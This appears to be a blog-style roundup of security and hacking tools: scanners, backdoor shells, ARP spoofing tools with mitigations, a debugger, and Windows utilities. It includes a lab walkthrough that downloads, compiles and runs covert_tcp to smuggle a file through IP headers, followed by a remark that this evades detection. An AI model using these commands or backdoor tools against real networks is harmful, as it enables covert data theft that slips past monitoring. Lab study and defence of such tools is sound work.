Top Security Hacking Tools
- Metasploit Project - open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development
- Netwag – Graphical front end for netwox which contains 223 tools
- Netcat – Computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable “back-end” device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities.
- Nessus security scanner
- OpenVAS – Open Vulnerability Assessment System
- nmap – Security Scanner For Network Exploration & Hacking
Covertly Access Remote Systems
- AckCmd is a backdoor client/server combination that lets you open a remote Command Prompt to another system (running the server part of AckCmd). It communicates using only TCP ACK segments. This way the client component is able to directly contact the server component through a firewall in some cases (static packet filters).
- ICMP Shell (ISH) is a telnet-like protocol. It allows users to connect to a remote host and to open a shell using only ICMP to send and receive data. ICMP Shell was written in C for the UNIX environment.
Covert_TCP– Program a hacker uses to send a file through a firewall one byte at a time by hiding the data in the IP header.
To Compile: (thank you https://www.os3.nl/2009-2010/students/axel_puppe/ids/networking_log)
wget http://www-scf.usc.edu/~csci530l/downloads/covert_tcp.c cc -o covert_tcp covert_tcp.c
We did the above on 2 machines (client & server).
On the client we ran this:
sudo ./covert_tcp -dest 220.127.116.11 -source 18.104.22.168 -file file.txt
On the server we ran this:
sudo ./covert_tcp -source 22.214.171.124 -server -file test.txt
On the server we saw the data coming in:
Receiving Data: S
Receiving Data: n
Receiving Data: e
Receiving Data: @
Receiving Data: k
Receiving Data: y
Receiving Data: !
We received “Sne@ky” on the server, so this worked!
Throughput: However, the speed was atrocious at best: about 1 char (1 byte) per second.
Snort rule to detect covert_tcp covert_tcp has one big flaw, it’s really slow. Which in turn is its strong suit because this makes detecting it really hard. The footprint of the tiny bytes of data going through makes it very tricky to detect.
did not succeed to create a rule to detect covert_tcp communication, best bet if you want to stay undetected :)
ARP Exploitation – Man in the Middle Attack
Risk Analysis of ARP
- No authentication.
- Information leak. All hosts in the same Ethernet VLAN learn the mapping
of host A. Moreover, they discover that host A wants to talk to host B.
- Availability issue. All hosts in the same Ethernet LAN receive the ARP request (sent in a broadcast frame) and have to process it. A hostile attacker could send thousands of ARP request frames per second, and all hosts on the LAN have to process these frames. This wastes network bandwidth and CPU time.
- dsniff: include arpspoof http://www.monkey.org/~dugsong/dsniff/
- ettercap: http://ettercap.sourceforge.net/
- cain: http://www.oxid.it/
- hunt: http://linux.die.net/man/1/hunt
Mitigating an ARP Spoofing Attack
- Layer 3 switch – DHCP Snooping is a basis for Dynamic ARP Inspection (DAI).
mapping learned from DHCP (or static address manually entered)
- Host - Can ignore the gratuitous ARP packets.
- Intrusion detection systems (IDS) – Can keep states about all
mappings and detect whether someone tries to change an existing mapping.
- Cisco IDS
- ARPWatch (a free tool) – ftp://ftp.ee.lbl.gov/arpwatch.tar.gz
Immunity Debugger is a powerful new way to write exploits, analyze malware, and reverse engineer binary files. It builds on a solid user interface with function graphing, the industry’s first heap analysis tool built specifically for heap creation, and a large and well supported Python API for easy extensibility.
A debugger with functionality designed specifically for the security industry
Cuts exploit development time by 50%
Simple, understandable interfaces
Robust and powerful scripting language for automating intelligent debugging
Lightweight and fast debugging to prevent corruption during complex analysis
Connectivity to fuzzers and exploit development tools
The Best of Both Worlds
Immunity Debugger’s interfaces include the GUI and a command line. The command line is always available at the bottom of the GUI. It allows the user to type shortcuts as if they were in a typical text-based debugger, such as WinDBG or GDB. Immunity has implemented aliases to ensure that your WinDBG users do not have to be retrained and will get the full productivity boost that comes from the best debugger interface on the market.
Get Immunity Debugger here
Troubleshooting Utilities – Windows
Download NirLauncher Package
|Current Package Version:||1.10.06|
|File Size:||8530769 Bytes|
|Updated On:||November 07 2010 07:07:33|
Notice: Don’t use any aggressive download manager that opens multiple connections. If you do so, your IP address might be blocked from downloading this package.
|sysinternals2.nlp||This package file allows you to easily add SysInternals Suite into NirLauncher. In order to use this file, follow the instructions below:
|joeware.nlp||This package file allows you to easily add joeware free tools into NirLauncher.
You can download Joeware tools from joeware free tools Web page, drop all the tools that you need into one folder, and then add joeware.nlp into this folder. After that, simply drag joeware.nlp from Explorer into the main window of NirLauncher.
Windows – MISC
- IP scan Angry IP scanner is a very fast IP scanner and port scanner. It can scan IP addresses in any range as well as any their ports. Angry IP scanner simply pings each IP address to check if it’s alive, then optionally it is resolving its hostname, determines the MAC address, scans ports, etc
- Getmac provides a quick method for obtaining the MAC (Ethernet) layer address and binding order for a computer running Windows 2000, locally or across a network
- IM Sniffer Intercepts and decodes all instant message traffic (currently AOL Instant Messenger, AIM Express, ICQ, MSN and Yahoo) sent/received by the local computer or another computer on the network
- CurrPorts v1.83 displays the list of all currently opened TCP/IP and UDP ports on your local computer. For each port in the list, information about the process that opened the port is also displayed, including the process name, full path of the process, version information of the process
- mRemote mRemote allows you to manage all your remote connections in a single place. Currently it supports the RDP, VNC, SSH2 and Telnet protocols